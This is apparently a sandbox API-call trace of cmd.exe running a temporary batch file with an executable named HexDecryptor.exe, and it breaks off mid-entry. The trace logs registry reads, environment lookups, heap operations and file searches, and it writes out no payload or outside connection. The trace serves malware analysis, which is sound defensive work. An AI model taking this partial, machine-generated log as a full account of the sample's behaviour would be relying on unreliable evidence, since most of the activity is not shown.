FreeEnvironmentStringsA (penv="=") returned 1 [0124.159] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9fd6d1eb48 | out: phkResult=0x9fd6d1eb48*=0x88) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x0, lpData=0x9fd6d1eb60*=0x6a, lpcbData=0x9fd6d1eb44*=0x1000) returned 0x2 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x1, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x0, lpData=0x9fd6d1eb60*=0x1, lpcbData=0x9fd6d1eb44*=0x1000) returned 0x2 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x0, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x40, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x40, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x0, lpData=0x9fd6d1eb60*=0x40, lpcbData=0x9fd6d1eb44*=0x1000) returned 0x2 [0124.160] RegCloseKey (hKey=0x88) returned 0x0 [0124.160] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9fd6d1eb48 | out: phkResult=0x9fd6d1eb48*=0x88) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x0, lpData=0x9fd6d1eb60*=0x40, lpcbData=0x9fd6d1eb44*=0x1000) returned 0x2 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x1, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x0, lpData=0x9fd6d1eb60*=0x1, lpcbData=0x9fd6d1eb44*=0x1000) returned 0x2 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x0, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.160] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x9, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.161] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x4, lpData=0x9fd6d1eb60*=0x9, lpcbData=0x9fd6d1eb44*=0x4) returned 0x0 [0124.161] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9fd6d1eb40, lpData=0x9fd6d1eb60, lpcbData=0x9fd6d1eb44*=0x1000 | out: lpType=0x9fd6d1eb40*=0x0, lpData=0x9fd6d1eb60*=0x9, lpcbData=0x9fd6d1eb44*=0x1000) returned 0x2 [0124.161] RegCloseKey (hKey=0x88) returned 0x0 [0124.161] time (in: timer=0x0 | out: timer=0x0) returned 0x5f47c263 [0124.161] srand (_Seed=0x5f47c263) [0124.161] GetCommandLineW () returned="\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"" [0124.161] malloc (_Size=0x4000) returned 0x27eb58c5960 [0124.162] GetCommandLineW () returned="\"C:\\WINDOWS\\sysnative\\cmd\" /c \"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe\"" [0124.162] malloc (_Size=0xffce) returned 0x27eb58d0080 [0124.162] ??_V@YAXPEAX@Z () returned 0x27eb58d0080 [0124.164] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27eb58d0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0124.164] malloc (_Size=0xffce) returned 0x27eb58e0060 [0124.164] ??_V@YAXPEAX@Z () returned 0x27eb58e0060 [0124.165] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27eb58e0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0124.165] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0124.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.166] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0124.166] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0124.166] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.166] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0124.166] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0124.166] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0124.166] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0124.166] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0124.166] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0124.166] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0124.166] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0124.166] malloc (_Size=0xffce) returned 0x27eb58f0040 [0124.166] ??_V@YAXPEAX@Z () returned 0x27eb58f0040 [0124.167] GetProcessHeap () returned 0x27eb56d0000 [0124.167] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x40) returned 0x27eb56d42c0 [0124.167] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27eb58f0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0124.168] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x27eb58f0040, lpFilePart=0x9fd6d1f6c0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x9fd6d1f6c0*="Desktop") returned 0x17 [0124.168] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0124.168] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x9fd6d1f3f0 | out: lpFindFileData=0x9fd6d1f3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x27eb56d8ca0 [0124.169] FindClose (in: hFindFile=0x27eb56d8ca0 | out: hFindFile=0x27eb56d8ca0) returned 1 [0124.169] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x9fd6d1f3f0 | out: lpFindFileData=0x9fd6d1f3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x27eb56d8ca0 [0124.169] FindClose (in: hFindFile=0x27eb56d8ca0 | out: hFindFile=0x27eb56d8ca0) returned 1 [0124.169] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x9fd6d1f3f0 | out: lpFindFileData=0x9fd6d1f3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe8e40f61, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xe8e40f61, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x27eb56d8ca0 [0124.169] FindClose (in: hFindFile=0x27eb56d8ca0 | out: hFindFile=0x27eb56d8ca0) returned 1 [0124.170] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0124.170] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0124.170] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0124.170] GetProcessHeap () returned 0x27eb56d0000 [0124.170] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d6f00) returned 1 [0124.170] GetEnvironmentStringsW () returned 0x27eb56d6030* [0124.170] GetProcessHeap () returned 0x27eb56d0000 [0124.170] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xec2) returned 0x27eb56d6f00 [0124.170] FreeEnvironmentStringsA (penv="=") returned 1 [0124.170] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27eb58d0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0124.170] GetProcessHeap () returned 0x27eb56d0000 [0124.170] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d42c0) returned 1 [0124.170] ??_V@YAXPEAX@Z () returned 0x1 [0124.171] ??_V@YAXPEAX@Z () returned 0x1 [0124.171] GetProcessHeap () returned 0x27eb56d0000 [0124.171] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4016) returned 0x27eb56d8ca0 [0124.171] GetProcessHeap () returned 0x27eb56d0000 [0124.171] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xe6) returned 0x27eb56d6030 [0124.171] GetProcessHeap () returned 0x27eb56d0000 [0124.171] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4010) returned 0x27eb56dccc0 [0124.172] GetProcessHeap () returned 0x27eb56d0000 [0124.172] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4010) returned 0x27eb56e0ce0 [0124.226] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0124.227] malloc (_Size=0xffce) returned 0x27eb58e0060 [0124.227] ??_V@YAXPEAX@Z () returned 0x27eb58e0060 [0124.227] GetProcessHeap () returned 0x27eb56d0000 [0124.227] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1ffac) returned 0x27eb56e4d00 [0124.231] SetErrorMode (uMode=0x0) returned 0x0 [0124.231] SetErrorMode (uMode=0x1) returned 0x0 [0124.231] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\.", nBufferLength=0xffce, lpBuffer=0x27eb56e4d10, lpFilePart=0x9fd6d1f800 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x9fd6d1f800*="Desktop") returned 0x55 [0124.232] SetErrorMode (uMode=0x0) returned 0x1 [0124.232] GetProcessHeap () returned 0x27eb56d0000 [0124.232] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56e4d00, Size=0xde) returned 0x27eb56e4d00 [0124.232] GetProcessHeap () returned 0x27eb56d0000 [0124.232] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56e4d00) returned 0xde [0124.232] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\.") returned 1 [0124.232] GetProcessHeap () returned 0x27eb56d0000 [0124.232] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xc2) returned 0x27eb56d6120 [0124.232] GetProcessHeap () returned 0x27eb56d0000 [0124.232] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x170) returned 0x27eb56d6a00 [0124.233] GetProcessHeap () returned 0x27eb56d0000 [0124.233] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56d6a00, Size=0xc2) returned 0x27eb56d6a00 [0124.233] GetProcessHeap () returned 0x27eb56d0000 [0124.233] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56d6a00) returned 0xc2 [0124.233] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.233] GetProcessHeap () returned 0x27eb56d0000 [0124.233] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xe8) returned 0x27eb56d0730 [0124.239] GetProcessHeap () returned 0x27eb56d0000 [0124.239] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56d0730, Size=0x7e) returned 0x27eb56d0730 [0124.239] GetProcessHeap () returned 0x27eb56d0000 [0124.239] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56d0730) returned 0x7e [0124.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.239] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", fInfoLevelId=0x1, lpFindFileData=0x9fd6d1f570, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9fd6d1f570) returned 0xffffffffffffffff [0124.239] GetLastError () returned 0x7b [0124.239] ??_V@YAXPEAX@Z () returned 0x1 [0124.240] GetProcessHeap () returned 0x27eb56d0000 [0124.240] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56dccc0) returned 1 [0124.241] GetProcessHeap () returned 0x27eb56d0000 [0124.241] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56e0ce0) returned 1 [0124.242] GetProcessHeap () returned 0x27eb56d0000 [0124.242] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d8ca0) returned 1 [0124.242] GetConsoleOutputCP () returned 0x1b5 [0124.380] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0124.380] GetUserDefaultLCID () returned 0x409 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff67b90bb78, cchData=8 | out: lpLCData=":") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x9fd6d1fa80, cchData=128 | out: lpLCData="0") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x9fd6d1fa80, cchData=128 | out: lpLCData="0") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x9fd6d1fa80, cchData=128 | out: lpLCData="1") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff67b90bb68, cchData=8 | out: lpLCData="/") returned 2 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff67b90bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff67b90bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff67b90ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff67b90ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff67b90ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0124.381] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff67b90b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0124.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff67b90b980, cchData=32 | out: lpLCData="Sun") returned 4 [0124.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff67b90bb58, cchData=8 | out: lpLCData=".") returned 2 [0124.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff67b90bb40, cchData=8 | out: lpLCData=",") returned 2 [0124.382] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.383] GetProcessHeap () returned 0x27eb56d0000 [0124.383] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x0, Size=0x20c) returned 0x27eb56d6ae0 [0124.383] GetConsoleTitleW (in: lpConsoleTitle=0x27eb56d6ae0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x29 [0124.520] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0124.520] GetProcAddress (hModule=0x7ffce9120000, lpProcName="CopyFileExW") returned 0x7ffce913e830 [0124.521] GetProcAddress (hModule=0x7ffce9120000, lpProcName="IsDebuggerPresent") returned 0x7ffce913e300 [0124.521] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffce6900a40 [0124.521] ??_V@YAXPEAX@Z () returned 0x1 [0124.521] GetProcessHeap () returned 0x27eb56d0000 [0124.522] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56d8ca0 [0124.522] GetProcessHeap () returned 0x27eb56d0000 [0124.522] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d8ca0) returned 1 [0124.527] _wcsicmp (_String1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat", _String2=")") returned 58 [0124.527] _wcsicmp (_String1="FOR", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 3 [0124.528] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 3 [0124.528] _wcsicmp (_String1="IF", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 6 [0124.528] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 6 [0124.529] _wcsicmp (_String1="REM", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 15 [0124.529] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat") returned 15 [0124.529] GetProcessHeap () returned 0x27eb56d0000 [0124.529] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56d6d00 [0124.529] GetProcessHeap () returned 0x27eb56d0000 [0124.529] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x8c) returned 0x27eb56d6dc0 [0124.530] GetProcessHeap () returned 0x27eb56d0000 [0124.530] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x64) returned 0x27eb56d6e60 [0124.531] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1f970, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x29 [0124.709] malloc (_Size=0xffce) returned 0x27eb58e0060 [0124.709] ??_V@YAXPEAX@Z () returned 0x27eb58e0060 [0124.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.710] malloc (_Size=0xffce) returned 0x27eb58f0040 [0124.710] ??_V@YAXPEAX@Z () returned 0x27eb58f0040 [0124.711] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.712] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x27eb58f0040, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0x9fd6d1f4c0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x9fd6d1f4c0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.715] ??_V@YAXPEAX@Z () returned 0x1 [0124.715] GetProcessHeap () returned 0x27eb56d0000 [0124.716] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xffde) returned 0x27eb56e6aa0 [0124.716] GetProcessHeap () returned 0x27eb56d0000 [0124.716] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xe0) returned 0x27eb56d8ca0 [0124.716] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0124.716] malloc (_Size=0xffce) returned 0x27eb58f0040 [0124.716] ??_V@YAXPEAX@Z () returned 0x27eb58f0040 [0124.716] GetProcessHeap () returned 0x27eb56d0000 [0124.716] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1ffac) returned 0x27eb56f6a90 [0124.720] SetErrorMode (uMode=0x0) returned 0x0 [0124.720] SetErrorMode (uMode=0x1) returned 0x0 [0124.721] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\.", nBufferLength=0xffce, lpBuffer=0x27eb56f6aa0, lpFilePart=0x9fd6d1f1f0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp", lpFilePart=0x9fd6d1f1f0*="4AD6.tmp") returned 0x34 [0124.721] SetErrorMode (uMode=0x0) returned 0x1 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56f6a90, Size=0x8c) returned 0x27eb56f6a90 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56f6a90) returned 0x8c [0124.721] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\.") returned 1 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x80) returned 0x27eb56d8d90 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xec) returned 0x27eb56d8e20 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56d8e20, Size=0x80) returned 0x27eb56d8e20 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56d8e20) returned 0x80 [0124.721] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.721] GetProcessHeap () returned 0x27eb56d0000 [0124.721] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xe8) returned 0x27eb56d8eb0 [0124.723] GetProcessHeap () returned 0x27eb56d0000 [0124.723] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56d8eb0, Size=0x7e) returned 0x27eb56d8eb0 [0124.723] GetProcessHeap () returned 0x27eb56d0000 [0124.723] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56d8eb0) returned 0x7e [0124.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.723] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat", fInfoLevelId=0x1, lpFindFileData=0x9fd6d1ef60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9fd6d1ef60) returned 0x27eb56d8f40 [0124.726] GetProcessHeap () returned 0x27eb56d0000 [0124.726] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x0, Size=0x28) 